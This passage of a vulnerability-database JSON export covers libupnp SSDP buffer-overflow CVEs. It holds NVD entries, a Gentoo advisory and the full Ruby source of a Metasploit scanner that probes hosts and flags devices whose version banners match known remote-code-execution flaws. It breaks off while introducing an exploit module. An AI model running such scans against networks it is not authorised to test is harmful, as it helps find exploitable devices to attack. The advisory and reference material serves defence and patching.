Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5965", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5965"], "modified": "2015-09-01T17:08:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5965", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka uuid) field within a string that contains a :: (colon colon) in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. 
Any application linking to libupnp is likely to be affected\"", "edition": 6, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5959", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5959"], "modified": "2017-11-03T01:29:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10", 
"cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3"], "id": "CVE-2012-5959", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5959", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17:*:*:*:*:*:*:*", 
"cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long ServiceType (aka urn service) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. 
Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5964", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5964"], "modified": "2015-09-01T17:07:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5964", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5964", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long DeviceType (aka urn) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. 
Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5962", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5962"], "modified": "2015-09-01T17:05:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5962", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. 
Any application linking to libupnp is likely to be affected\"", "edition": 6, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5960", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5960"], "modified": "2017-11-03T01:29:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10", 
"cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6", "cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3"], "id": "CVE-2012-5960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5960", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.17:*:*:*:*:*:*:*", 
"cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) before 1.6.18 allows remote attackers to execute arbitrary code via a UDP packet with a crafted string that is not properly handled after a certain pointer subtraction.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681\n\n\"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. 
Any application linking to libupnp is likely to be affected\"", "edition": 6, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5958", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5958"], "modified": "2020-11-28T19:15:00", "cpe": ["cpe:/a:libupnp_project:libupnp:1.4.4", "cpe:/a:libupnp_project:libupnp:1.6.1", "cpe:/a:libupnp_project:libupnp:1.4.7", "cpe:/a:libupnp_project:libupnp:1.6.10", "cpe:/a:libupnp_project:libupnp:1.6.11", "cpe:/a:libupnp_project:libupnp:1.6.4", "cpe:/a:libupnp_project:libupnp:1.4.5", "cpe:/a:libupnp_project:libupnp:1.4.3", "cpe:/a:libupnp_project:libupnp:1.6.15", "cpe:/a:libupnp_project:libupnp:1.6.3", "cpe:/a:libupnp_project:libupnp:1.6.13", "cpe:/a:libupnp_project:libupnp:1.6.17", "cpe:/a:libupnp_project:libupnp:1.6.16", "cpe:/a:libupnp_project:libupnp:1.6.14", "cpe:/a:libupnp_project:libupnp:1.6.0", "cpe:/a:libupnp_project:libupnp:1.6.2", "cpe:/a:libupnp_project:libupnp:1.4.6", "cpe:/a:libupnp_project:libupnp:1.6.12", "cpe:/a:libupnp_project:libupnp:1.6.6", "cpe:/a:libupnp_project:libupnp:1.6.9", "cpe:/a:libupnp_project:libupnp:1.6.5", "cpe:/a:libupnp_project:libupnp:1.6.7", "cpe:/a:libupnp_project:libupnp:1.4.2", "cpe:/a:libupnp_project:libupnp:1.4.0", "cpe:/a:libupnp_project:libupnp:1.4.1", "cpe:/a:libupnp_project:libupnp:1.6.8"], "id": "CVE-2012-5958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5958", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:libupnp_project:libupnp:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:libupnp_project:libupnp:1.6.10:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:28", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958"], "edition": 1, "description": "### Background\n\nlibupnp is a portable, open source, UPnP development kit.\n\n### Description\n\nMultiple buffer overflow vulnerabilities have been discovered in libupnp. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll libupnp users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/libupnp-1.6.18\"", "modified": "2014-03-26T00:00:00", "published": "2014-03-26T00:00:00", "id": "GLSA-201403-06", "href": "https://security.gentoo.org/glsa/201403-06", "type": "gentoo", "title": "libupnp: Arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-17T16:23:47", "description": "Discover information from UPnP-enabled systems\n", "published": "2010-11-09T06:24:32", "type": "metasploit", "title": "UPnP SSDP M-SEARCH Information Discovery", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2013-0229", "CVE-2013-0230"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/UPNP/SSDP_MSEARCH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::UDPScanner\n\n def initialize\n super(\n 'Name' => 'UPnP SSDP M-SEARCH Information Discovery',\n 'Description' => 'Discover information from UPnP-enabled systems',\n 'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2012-5958'],\n ['CVE', '2012-5959'],\n ['CVE', '2013-0230'],\n ['CVE', '2013-0229']\n ]\n )\n\n register_options( [\n Opt::RPORT(1900),\n OptBool.new('REPORT_LOCATION', [true, 'This determines whether to report the UPnP endpoint service advertised by SSDP', false ])\n ])\n end\n\n def 
rport\n datastore['RPORT']\n end\n\n def setup\n super\n @msearch_probe =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:upnp:rootdevice\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:3\\r\\n\" +\n \"\\r\\n\"\n end\n\n def scanner_prescan(batch)\n print_status(\"Sending UPnP SSDP probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)\")\n @results = {}\n end\n\n def scan_host(ip)\n vprint_status \"#{ip}:#{rport} - SSDP - sending M-SEARCH probe\"\n scanner_send(@msearch_probe, ip, datastore['RPORT'])\n end\n\n def scanner_postscan(batch)\n print_status \"No SSDP endpoints found.\" if @results.empty?\n\n @results.each_pair do |skey,res|\n sinfo = res[:service]\n next unless sinfo\n\n bits = []\n\n [ :server, :location, :usn ].each do |k|\n bits << res[:info][k] if res[:info][k]\n end\n\n desc = bits.join(\" | \")\n sinfo[:info] = desc\n\n res[:vulns] = []\n\n if res[:info][:server].to_s =~ /MiniUPnPd\\/1\\.0([\\.\\,\\-\\~\\s]|$)/mi\n res[:vulns] << {\n :name => \"MiniUPnPd ProcessSSDPRequest() Out of Bounds Memory Access Denial of Service\",\n :refs => [ 'CVE-2013-0229' ]\n }\n end\n\n if res[:info][:server].to_s =~ /MiniUPnPd\\/1\\.[0-3]([\\.\\,\\-\\~\\s]|$)/mi\n res[:vulns] << {\n :name => \"MiniUPnPd ExecuteSoapAction memcpy() Remote Code Execution\",\n :refs => [ 'CVE-2013-0230' ],\n :port => res[:info][:ssdp_port] || 80,\n :proto => 'tcp'\n }\n end\n\n if res[:info][:server].to_s =~ /Intel SDK for UPnP devices.*|Portable SDK for UPnP devices(\\/?\\s*$|\\/1\\.([0-5]\\..*|8\\.0.*|(6\\.[0-9]|6\\.1[0-7])([\\.\\,\\-\\~\\s]|$)))/mi\n res[:vulns] << {\n :name => \"Portable SDK for UPnP Devices unique_service_name() Remote Code Execution\",\n :refs => [ 'CVE-2012-5958', 'CVE-2012-5959' ]\n }\n end\n\n if res[:vulns].length > 0\n vrefs = []\n res[:vulns].each do |v|\n v[:refs].each do |r|\n vrefs << r\n end\n end\n\n print_good(\"#{skey} SSDP #{desc} | vulns:#{res[:vulns].count} (#{vrefs.join(\", \")})\")\n else\n 
print_status(\"#{skey} SSDP #{desc}\")\n end\n\n report_service( sinfo )\n\n res[:vulns].each do |v|\n report_vuln(\n :host => sinfo[:host],\n :port => v[:port] || sinfo[:port],\n :proto => v[:proto] || 'udp',\n :name => v[:name],\n :info => res[:info][:server],\n :refs => v[:refs]\n )\n end\n\n if res[:info][:ssdp_host]\n report_service(\n :host => res[:info][:ssdp_host],\n :port => res[:info][:ssdp_port],\n :proto => 'tcp',\n :name => 'upnp',\n :info => res[:info][:location].to_s\n ) if datastore['REPORT_LOCATION']\n end\n end\n end\n\n def scanner_process(data, shost, sport)\n\n skey = \"#{shost}:#{datastore['RPORT']}\"\n\n @results[skey] ||= {\n :info => { },\n :service => {\n :host => shost,\n :port => datastore['RPORT'],\n :proto => 'udp',\n :name => 'ssdp'\n }\n }\n\n if data =~ /^Server:[\\s]*(.*)/i\n @results[skey][:info][:server] = $1.strip\n end\n\n ssdp_host = nil\n ssdp_port = 80\n location_string = ''\n if data =~ /^Location:[\\s]*(.*)/i\n location_string = $1\n @results[skey][:info][:location] = $1.strip\n if location_string[/(https?):\\x2f\\x2f([^\\x5c\\x2f]+)/]\n ssdp_host,ssdp_port = $2.split(\":\") if $2.respond_to?(:split)\n if ssdp_port.nil?\n ssdp_port = ($1 == \"http\" ? 80 : 443)\n end\n\n if ssdp_host and ssdp_port\n @results[skey][:info][:ssdp_host] = ssdp_host\n @results[skey][:info][:ssdp_port] = ssdp_port.to_i\n end\n\n end\n end\n\n if data =~ /^USN:[\\s]*(.*)/i\n @results[skey][:info][:usn] = $1.strip\n end\n\n end\n\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/upnp/ssdp_msearch.rb"}, {"lastseen": "2020-10-12T23:13:30", "description": "This module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for 